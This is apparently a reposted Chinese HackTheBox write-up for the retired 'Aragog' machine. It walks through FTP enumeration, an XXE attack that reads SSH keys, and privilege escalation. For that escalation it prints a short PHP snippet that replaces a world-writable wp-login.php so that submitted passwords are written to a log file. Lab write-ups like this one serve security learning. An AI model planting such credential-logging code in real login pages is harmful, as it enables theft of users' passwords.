zoukankan      html  css  js  c++  java
  • HTB-靶机-Aragog

    本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

    靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.78

    本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

    执行命令 autorecon 10.10.10.78 -o ./Aragog-autorecon

    开放了3个端口,根据nmap的扫描结果,开放的ftp服务可以匿名登录并且上面有个文件test.txt将其下载下来得到如下信息

    看此信息是个xml类型的文件内容,有可能跟xxe有关,再看看爆破的目录效果

    发现了个有用的hosts.php文件,访问看看

    没啥重要信息,想想把上面结果起来看看,使用burpsuite重放请求,具体关于xxe的攻击参考:https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection

    根据上面显示,增加xxe攻击代码,构造语句,得出下面测试代码

    知道了有两个用户,读取每个用户的密钥试试,但是只成功了一个,具体如下

    将得到的密钥复制到本地给权限600然后ssh登录到目标靶机

    准备开始提权了,查看了目标靶机的系统内核和所使用的操作系统

    确认系统架构之后开始监控下系统进程运行的情况,这里使用pspy这个款工具,前面也介绍到了,链接:https://github.com/DominicBreuker/pspy

    确认每分钟都有计划任务在执行目标靶机的登录功能,查看下网站根目录发现存在dev_wiki这个目录,访问的时候会自动跳转一个域名,通过本地绑定hosts来完成正常访问,没发现啥东西,还是直接修改上述计划任务执行的wp-login.php文件,因为目录dev_wiki是777权限,所有人都可以进行修改,修改成如下代码

    <?php
    file_put_contents("bmfx.log", print_r($_POST, true));
    ?>

    最终得到密码

    使用su直接切换至root用户

  • 相关阅读:
    Linux终端设置免密登陆ssh(以 XShell 为例)
    Docker入门(一)-安装
    find命令总结
    CentOS 恢复 rm -rf 误删除数据
    CentOS系统登陆root用户后发现提示符显示-bash-4.2#(已解决)
    一次在CentOS系统单用户模式下使用passwd命令破密失败的案例
    Ubuntu下配置IP地址
    安装CentOS 6.x报错"Disk sda contains BIOS RAID metadata"解决方法
    YUM命令总结
    git从安装到多账户操作一套搞定(二)多账户使用
  • 原文地址:https://www.cnblogs.com/autopwn/p/14085494.html
Copyright © 2011-2022 走看看